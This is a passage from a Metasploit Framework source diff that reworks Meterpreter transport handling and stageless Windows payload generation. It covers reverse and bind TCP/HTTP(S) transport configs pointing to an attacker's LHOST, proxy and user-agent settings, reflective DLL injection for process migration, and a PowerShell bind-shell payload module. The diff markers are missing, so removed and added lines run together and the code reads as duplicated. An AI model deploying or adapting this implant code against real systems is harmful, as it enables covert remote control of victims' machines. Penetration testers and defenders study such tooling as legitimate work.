request.add_tlv(TLV_TYPE_TRANS_PROXY_INFO, proxy)
if opts[:proxy_user]
request.add_tlv(TLV_TYPE_TRANS_PROXY_USER, opts[:proxy_user])
end
if opts[:proxy_pass]
request.add_tlv(TLV_TYPE_TRANS_PROXY_PASS, opts[:proxy_pass])
end
end
end
request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
request.add_tlv(TLV_TYPE_TRANS_URL, url)
def transport_next
request = Packet.create_request('core_transport_next')
client.send_request(request)
return true
end
def transport_prev
request = Packet.create_request('core_transport_prev')
client.send_request(request)
return true
end
@ -599,11 +585,87 @@ class ClientCore < Extension
# Indicates if the given transport is a valid transport option.
#
def valid_transport?(transport)
VALID_TRANSPORTS.has_key?(transport.downcase)
if transport
VALID_TRANSPORTS.has_key?(transport.downcase)
else
false
end
end
private
def transport_prepare_request(method, opts={})
unless valid_transport?(opts[:transport]) && opts[:lport]
return nil
end
if opts[:transport].starts_with?('reverse')
return false unless opts[:lhost]
else
# Bind shouldn't have lhost set
opts[:lhost] = nil
end
transport = VALID_TRANSPORTS[opts[:transport]]
request = Packet.create_request(method)
scheme = opts[:transport].split('_')[1]
url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
if opts[:comm_timeout]
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
end
if opts[:session_exp]
request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
end
if opts[:retry_total]
request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
end
if opts[:retry_wait]
request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
end
# do more magic work for http(s) payloads
unless opts[:transport].ends_with?('tcp')
sum = uri_checksum_lookup(:connect)
url << generate_uri_uuid(sum, opts[:uuid]) + '/'
# TODO: randomise if not specified?
opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
hash = Rex::Parser::X509Certificate.get_cert_file_hash(opts[:cert])
request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
end
if opts[:proxy_host] && opts[:proxy_port]
prefix = 'http://'
prefix = 'socks=' if opts[:proxy_type] == 'socks'
proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
request.add_tlv(TLV_TYPE_TRANS_PROXY_HOST, proxy)
if opts[:proxy_user]
request.add_tlv(TLV_TYPE_TRANS_PROXY_USER, opts[:proxy_user])
end
if opts[:proxy_pass]
request.add_tlv(TLV_TYPE_TRANS_PROXY_PASS, opts[:proxy_pass])
end
end
end
request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
request.add_tlv(TLV_TYPE_TRANS_URL, url)
return request
end
def generate_payload_stub(process)
case client.platform
when /win/i
@ -623,11 +685,9 @@ class ClientCore < Extension
# Include the appropriate reflective dll injection module for the target process architecture...
if process['arch'] == ARCH_X86
c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
binary_suffix = "x86.dll"
c.include( ::Msf::Payload::Windows::MeterpreterLoader )
elsif process['arch'] == ARCH_X86_64
c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
binary_suffix = "x64.dll"
c.include( ::Msf::Payload::Windows::MeterpreterLoader_x64 )
else
raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
end
@ -635,37 +695,7 @@ class ClientCore < Extension
# Create the migrate stager
migrate_stager = c.new()
dll = MetasploitPayloads.meterpreter_path('metsrv', binary_suffix)
if dll.nil?
raise RuntimeError, "metsrv.#{binary_suffix} not found", caller
end
migrate_stager.datastore['DLL'] = dll
# Pass the timeout information to the RDI loader so that it correctly
# patches the timeouts into the binary.
migrate_stager.datastore['SessionExpirationTimeout'] = self.client.expiration
migrate_stager.datastore['SessionCommunicationTimeout'] = self.client.comm_timeout
migrate_stager.datastore['SessionRetryTotal'] = self.client.retry_total
migrate_stager.datastore['SessionRetryWait'] = self.client.retry_wait
blob = migrate_stager.stage_payload
if client.passive_service
# Patch options into metsrv for reverse HTTP payloads.
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
:ssl => client.ssl,
:url => self.client.url,
:expiration => self.client.expiration,
:comm_timeout => self.client.comm_timeout,
:retry_total => self.client.retry_total,
:retry_wait => self.client.retry_wait,
:ua => client.exploit_datastore['MeterpreterUserAgent'],
:proxy_host => client.exploit_datastore['PayloadProxyHost'],
:proxy_port => client.exploit_datastore['PayloadProxyPort'],
:proxy_type => client.exploit_datastore['PayloadProxyType'],
:proxy_user => client.exploit_datastore['PayloadProxyUser'],
:proxy_pass => client.exploit_datastore['PayloadProxyPass'])
end
blob = migrate_stager.stage_meterpreter
blob
end
@ -673,12 +703,6 @@ class ClientCore < Extension
def generate_linux_stub
blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(blob,
:expiration => self.client.expiration,
:comm_timeout => self.client.comm_timeout,
:retry_total => self.client.retry_total,
:retry_wait => self.client.retry_wait)
blob
end

7
lib/rex/post/meterpreter/packet.rb
View File

@ -94,13 +94,15 @@ TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_INFO = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_STRING | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
@ -199,12 +201,13 @@ class Tlv
when TLV_TYPE_TRANS_COMM_TIMEOUT; "TRANS-COMM-TIMEOUT"
when TLV_TYPE_TRANS_SESSION_EXP; "TRANS-SESSION-EXP"
when TLV_TYPE_TRANS_CERT_HASH; "TRANS-CERT-HASH"
when TLV_TYPE_TRANS_PROXY_INFO; "TRANS-PROXY-INFO"
when TLV_TYPE_TRANS_PROXY_HOST; "TRANS-PROXY-HOST"
when TLV_TYPE_TRANS_PROXY_USER; "TRANS-PROXY-USER"
when TLV_TYPE_TRANS_PROXY_PASS; "TRANS-PROXY-PASS"
when TLV_TYPE_TRANS_RETRY_TOTAL; "TRANS-RETRY-TOTAL"
when TLV_TYPE_TRANS_RETRY_WAIT; "TRANS-RETRY-WAIT"
when TLV_TYPE_MACHINE_ID; "MACHINE-ID"
when TLV_TYPE_UUID; "UUID"
#when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'
#when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address'

155
lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
View File

@ -77,7 +77,12 @@ class Console::CommandDispatcher::Core
end
if client.platform =~ /win/ || client.platform =~ /linux/
# Migration only supported on windows and linux
c["migrate"] = "Migrate the server to another process"
# UUID functionality isn't yet available on other platforms
c["uuid"] = "Get the UUID for the current session",
# Yet to implement transport hopping for other meterpreters.
# Works for posix and native windows though.
c["transport"] = "Change the current transport mechanism"
@ -280,10 +285,6 @@ class Console::CommandDispatcher::Core
# Disconnects the session
#
def cmd_detach(*args)
if not client.passive_service
print_error("Detach is only possible for non-stream sessions (http/https)")
return
end
client.shutdown_passive_dispatcher
shell.stop
end
@ -382,17 +383,34 @@ class Console::CommandDispatcher::Core
end
def print_timeouts(timeouts)
print_line("Session Expiry : @ #{(Time.now + timeouts[:session_exp]).strftime('%Y-%m-%d %H:%M:%S')}")
print_line("Comm Timeout : #{timeouts[:comm_timeout]} seconds")
print_line("Retry Total Time: #{timeouts[:retry_total]} seconds")
print_line("Retry Wait Time : #{timeouts[:retry_wait]} seconds")
if timeouts[:session_exp]
print_line("Session Expiry : @ #{(Time.now + timeouts[:session_exp]).strftime('%Y-%m-%d %H:%M:%S')}")
end
if timeouts[:comm_timeout]
print_line("Comm Timeout : #{timeouts[:comm_timeout]} seconds")
end
if timeouts[:retry_total]
print_line("Retry Total Time: #{timeouts[:retry_total]} seconds")
end
if timeouts[:retry_wait]
print_line("Retry Wait Time : #{timeouts[:retry_wait]} seconds")
end
end
#
# Get the machine ID of the target
#
def cmd_machine_id(*args)
print_good("Machine ID: #{client.core.machine_id}")
client.machine_id = client.core.machine_id unless client.machine_id
print_good("Machine ID: #{client.machine_id}")
end
#
# Get the machine ID of the target
#
def cmd_uuid(*args)
client.payload_uuid = client.core.uuid unless client.payload_uuid
print_good("UUID: #{client.payload_uuid}")
end
#
@ -494,20 +512,25 @@ class Console::CommandDispatcher::Core
'-ex' => [ true, 'Expiration timout (seconds) (default: same as current session)' ],
'-rt' => [ true, 'Retry total time (seconds) (default: same as current session)' ],
'-rw' => [ true, 'Retry wait time (seconds) (default: same as current session)' ],
'-v' => [ false, 'Show the verbose format of the transport list' ],
'-h' => [ false, 'Help menu' ])
#
# Display help for transport switching
# Display help for transport management.
#
def cmd_transport_help
print_line('Usage: transport [options]')
print_line('Usage: transport <list|change|add|next|prev> [options]')
print_line
print_line('Change the current Meterpreter transport mechanism')
print_line(' list: list the currently active transports.')
print_line(' add: add a new transport to the transport list.')
print_line(' change: same as add, but changes directly to the added entry.')
print_line(' next: jump to the next transport in the list (no options).')
print_line(' prev: jump to the previous transport in the list (no options).')
print_line(@@transport_opts.usage)
end
#
# Change the current transport setings.
# Manage transports
#
def cmd_transport(*args)
if ( args.length == 0 or args.include?("-h") )
@ -515,7 +538,14 @@ class Console::CommandDispatcher::Core
return
end
command = args.shift
unless ['list', 'add', 'change', 'prev', 'next'].include?(command)
cmd_transport_help
return
end
opts = {
:uuid => client.payload_uuid,
:transport => nil,
:lhost => nil,
:lport => nil,
@ -529,9 +559,11 @@ class Console::CommandDispatcher::Core
:session_exp => nil,
:retry_total => nil,
:retry_wait => nil,
:cert => nil
:cert => nil,
:verbose => false
}
valid = true
@@transport_opts.parse(args) do |opt, idx, val|
case opt
when '-c'
@ -560,21 +592,104 @@ class Console::CommandDispatcher::Core
opts[:lport] = val.to_i if val
when '-l'
opts[:lhost] = val
when '-v'
opts[:verbose] = true
when '-t'
unless client.core.valid_transport?(val)
cmd_transport_help
return
end
opts[:transport] = val
else
valid = false
end
end
print_status("Swapping transport ...")
if client.core.transport_change(opts)
client.shutdown_passive_dispatcher
shell.stop
else
print_error("Failed to switch transport, please check the parameters")
unless valid
cmd_transport_help
return
end
case command
when 'list'
result = client.core.transport_list
# this will output the session timeout first
print_timeouts(result)
columns =[
'Curr',
'URL',
'Comms T/O',
'Retry Total',
'Retry Wait'
]
if opts[:verbose]
columns << 'User Agent'
columns << 'Proxy Host'
columns << 'Proxy User'
columns << 'Proxy Pass'
columns << 'Cert Hash'
end
# next draw up a table of transport entries
tbl = Rex::Ui::Text::Table.new(
'Indent' => 4,
'Columns' => columns)
first = true
result[:transports].each do |t|
entry = [ first ? '*' : '', t[:url], t[:comm_timeout],
t[:retry_total], t[:retry_wait] ]
first = false
if opts[:verbose]
entry << t[:ua]
entry << t[:proxy_host]
entry << t[:proxy_user]
entry << t[:proxy_pass]
entry << (t[:cert_hash] || '').unpack("H*")[0]
end
tbl << entry
end
print("\n" + tbl.to_s + "\n")
when 'next'
print_status("Changing to next transport ...")
if client.core.transport_next
print_good("Successfully changed to the next transport, killing current session.")
client.shutdown_passive_dispatcher
shell.stop
else
print_error("Failed to change transport, please check the parameters")
end
when 'prev'
print_status("Changing to previous transport ...")
if client.core.transport_prev
print_good("Successfully changed to the previous transport, killing current session.")
client.shutdown_passive_dispatcher
shell.stop
else
print_error("Failed to change transport, please check the parameters")
end
when 'change'
print_status("Changing to new transport ...")
if client.core.transport_change(opts)
print_good("Successfully added #{opts[:transport]} transport, killing current session.")
client.shutdown_passive_dispatcher
shell.stop
else
print_error("Failed to change transport, please check the parameters")
end
when 'add'
print_status("Adding new transport ...")
if client.core.transport_add(opts)
print_good("Successfully added #{opts[:transport]} transport.")
else
print_error("Failed to add transport, please check the parameters")
end
end
end

2
metasploit-framework.gemspec
View File

@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
# Needed for Meterpreter on Windows, soon others.
spec.add_runtime_dependency 'metasploit-payloads', '0.0.3'
spec.add_runtime_dependency 'metasploit-payloads', '0.0.5'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# Needed by anemone crawler

16
modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
View File

@ -4,6 +4,7 @@
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/powershell'
require 'msf/core/payload/windows/powershell'
require 'msf/core/handler/bind_tcp'
@ -20,13 +21,11 @@ module Metasploit3
super(merge_info(info,
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
'Description' => 'Interacts with a powershell session on an established socket connection',
'Author' =>
[
'Author' => [
'Ben Turner', # benpturner
'Dave Hardy' # davehardy20
],
'References' =>
[
'References' => [
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
],
'License' => MSF_LICENSE,
@ -35,14 +34,9 @@ module Metasploit3
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::PowerShell,
'RequiredCmd' => 'generic',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
'Payload' => { 'Payload' => '' }
))
register_options(
[
register_options( [
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
], self.class)
end

40
modules/payloads/singles/windows/meterpreter_bind_tcp.rb
View File

@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 883358
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -35,9 +40,32 @@ module Metasploit4
end
def generate
# blank LHOST indicates bind payload
url = "tcp://:#{datastore['LPORT']}"
generate_stageless_x86(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_bind_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

48
modules/payloads/singles/windows/meterpreter_reverse_http.rb
View File

@ -4,18 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_http'
require 'msf/core/handler/reverse_http/stageless'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 884402
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Handler::ReverseHttp::Stageless
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -31,17 +34,38 @@ module Metasploit4
'Session' => Msf::Sessions::Meterpreter_x86_Win
))
initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
], self.class)
end
def generate
# generate a stageless payload using the x86 version of
# the stageless generator
opts = {
:ssl => false,
:generator => method(:generate_stageless_x86)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_http(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
generate_stageless(opts)
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

49
modules/payloads/singles/windows/meterpreter_reverse_https.rb
View File

@ -4,18 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_https'
require 'msf/core/handler/reverse_http/stageless'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 884402
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Handler::ReverseHttp::Stageless
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -31,17 +34,37 @@ module Metasploit4
'Session' => Msf::Sessions::Meterpreter_x86_Win
))
initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
], self.class)
end
def generate
# generate a stageless payload using the x86 version of
# the stageless generator
opts = {
:ssl => true,
:generator => method(:generate_stageless_x86)
}
generate_stageless(opts)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_https(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

39
modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
View File

@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 883358
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -36,8 +41,32 @@ module Metasploit4
end
def generate
url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"
generate_stageless_x86(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_ipv6_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

39
modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
View File

@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit3
CachedSize = :dynamic
CachedSize = 883358
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -35,8 +40,32 @@ module Metasploit3
end
def generate
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
generate_stageless_x86(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

40
modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
View File

@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1102498
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -35,9 +40,32 @@ module Metasploit4
end
def generate
# blank LHOST indicates bind payload
url = "tcp://:#{datastore['LPORT']}"
generate_stageless_x64(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X64
)
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_bind_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

48
modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
View File

@ -4,18 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_http'
require 'msf/core/handler/reverse_http/stageless'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1103542
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Handler::ReverseHttp::Stageless
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -31,17 +34,38 @@ module Metasploit4
'Session' => Msf::Sessions::Meterpreter_x64_Win
))
initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
], self.class)
end
def generate
# generate a stageless payload using the x64 version of
# the stageless generator
opts = {
:ssl => false,
:generator => method(:generate_stageless_x64)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X64
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_http(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
generate_stageless(opts)
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

48
modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
View File

@ -4,18 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_https'
require 'msf/core/handler/reverse_http/stageless'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1103542
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Handler::ReverseHttp::Stageless
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -31,17 +34,38 @@ module Metasploit4
'Session' => Msf::Sessions::Meterpreter_x64_Win
))
initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
], self.class)
end
def generate
# generate a stageless payload using the x64 version of
# the stageless generator
opts = {
:ssl => true,
:generator => method(:generate_stageless_x64)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X64
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_http(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
generate_stageless(opts)
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

39
modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
View File

@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1102498
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -36,8 +41,32 @@ module Metasploit4
end
def generate
url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"
generate_stageless_x64(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X64
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_ipv6_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

39
modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
View File

@ -5,15 +5,20 @@
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1102498
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -35,8 +40,32 @@ module Metasploit4
end
def generate
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
generate_stageless_x64(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
